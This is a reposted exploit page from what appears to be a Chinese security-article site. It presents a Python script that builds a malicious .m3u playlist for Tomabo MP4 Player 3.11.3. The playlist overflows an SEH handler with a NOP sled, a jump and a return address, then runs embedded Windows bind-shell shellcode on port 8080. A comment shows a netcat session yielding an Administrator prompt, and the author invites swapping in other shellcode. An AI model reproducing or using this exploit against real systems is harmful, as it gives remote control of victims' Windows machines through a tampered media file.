Tomabo MP4 Player 3.11.3 SEH Buffer Overflow

		当前位置：主页>安全文章>文章资料>Exploits>文章内容

Tomabo MP4 Player 3.11.3 SEH Buffer Overflow

来源：bytecod3r gmail.com 作者：Atabaki 发布时间：2015-08-10

#!/usr/bin/python
# Exploit Title: Tomabo MP4 Player 3.11.3 - (.m3u) SEH Buffer Overflow 
# Date: 03/08/2015
# Exploit Author: Saeid Atabaki
# E-Mail: bytecod3r <at> gmail.com, saeid <at> Nsecurity.org
# Linkedin: https://www.linkedin.com/in/saeidatabaki
# Vendor Homepage: http://tomabo.com/mp4-player/index.html
# Version: 3.11.3
# Tested on: Windows XP SP3
#---------------------------------------------------------------------#
# Badchars: "\x00\x0a\x0d\x0c\x20\x09\x1a"'
#
# nc 192.168.11.136 8080
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:\Documents and Settings\Administrator\Desktop>
#---------------------------------------------------------------------# 
 
import sys, struct
file="crash.m3u"
 
# Windows bind shell port 8080, feel free to swap shellcode
sc =  ""
sc += "\xdd\xc1\xd9\x74\x24\xf4\xb8\xd3\x4b\xb2\xa4\x5d\x31"
sc += "\xc9\xb1\x53\x31\x45\x17\x83\xc5\x04\x03\x96\x58\x50"
sc += "\x51\xe4\xb7\x16\x9a\x14\x48\x77\x12\xf1\x79\xb7\x40"
sc += "\x72\x29\x07\x02\xd6\xc6\xec\x46\xc2\x5d\x80\x4e\xe5"
sc += "\xd6\x2f\xa9\xc8\xe7\x1c\x89\x4b\x64\x5f\xde\xab\x55"
sc += "\x90\x13\xaa\x92\xcd\xde\xfe\x4b\x99\x4d\xee\xf8\xd7"
sc += "\x4d\x85\xb3\xf6\xd5\x7a\x03\xf8\xf4\x2d\x1f\xa3\xd6"
sc += "\xcc\xcc\xdf\x5e\xd6\x11\xe5\x29\x6d\xe1\x91\xab\xa7"
sc += "\x3b\x59\x07\x86\xf3\xa8\x59\xcf\x34\x53\x2c\x39\x47"
sc += "\xee\x37\xfe\x35\x34\xbd\xe4\x9e\xbf\x65\xc0\x1f\x13"
sc += "\xf3\x83\x2c\xd8\x77\xcb\x30\xdf\x54\x60\x4c\x54\x5b"
sc += "\xa6\xc4\x2e\x78\x62\x8c\xf5\xe1\x33\x68\x5b\x1d\x23"
sc += "\xd3\x04\xbb\x28\xfe\x51\xb6\x73\x97\x96\xfb\x8b\x67"
sc += "\xb1\x8c\xf8\x55\x1e\x27\x96\xd5\xd7\xe1\x61\x19\xc2"
sc += "\x56\xfd\xe4\xed\xa6\xd4\x22\xb9\xf6\x4e\x82\xc2\x9c"
sc += "\x8e\x2b\x17\x08\x86\x8a\xc8\x2f\x6b\x6c\xb9\xef\xc3"
sc += "\x05\xd3\xff\x3c\x35\xdc\xd5\x55\xde\x21\xd6\x46\x8f"
sc += "\xaf\x30\x12\xbf\xf9\xeb\x8a\x7d\xde\x23\x2d\x7d\x34"
sc += "\x1c\xd9\x36\x5e\x9b\xe6\xc6\x74\x8b\x70\x4d\x9b\x0f"
sc += "\x61\x52\xb6\x27\xf6\xc5\x4c\xa6\xb5\x74\x50\xe3\x2d"
sc += "\x14\xc3\x68\xad\x53\xf8\x26\xfa\x34\xce\x3e\x6e\xa9"
sc += "\x69\xe9\x8c\x30\xef\xd2\x14\xef\xcc\xdd\x95\x62\x68"
sc += "\xfa\x85\xba\x71\x46\xf1\x12\x24\x10\xaf\xd4\x9e\xd2"
sc += "\x19\x8f\x4d\xbd\xcd\x56\xbe\x7e\x8b\x56\xeb\x08\x73"
sc += "\xe6\x42\x4d\x8c\xc7\x02\x59\xf5\x35\xb3\xa6\x2c\xfe"
sc += "\xc3\xec\x6c\x57\x4c\xa9\xe5\xe5\x11\x4a\xd0\x2a\x2c"
sc += "\xc9\xd0\xd2\xcb\xd1\x91\xd7\x90\x55\x4a\xaa\x89\x33"
sc += "\x6c\x19\xa9\x11"
 
payload = "\x90" * 1028 + "\xeb\x18\x90\x90" + "\x69\x9e\x48\x00"  + "\x90" * 20 + sc
 
writeFile = open (file, "w")
writeFile.write( payload )
writeFile.close()

[

推荐] [

评论(0条)] [返回顶部] [打印本页] [关闭窗口]

匿名评论

评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。

§最新评论：

热点文章

·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1

推荐广告